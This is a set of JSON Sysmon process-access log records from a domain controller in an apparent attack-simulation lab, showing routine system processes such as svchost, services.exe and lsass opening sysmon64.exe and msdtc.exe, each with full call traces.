{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2845,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2846,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2847,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.232\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.232","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.279\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2808\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.279","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"2808","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:25.341\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1FED-5F25-0000-0010BD060500}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:25.341","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1FED-5F25-0000-0010BD060500}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
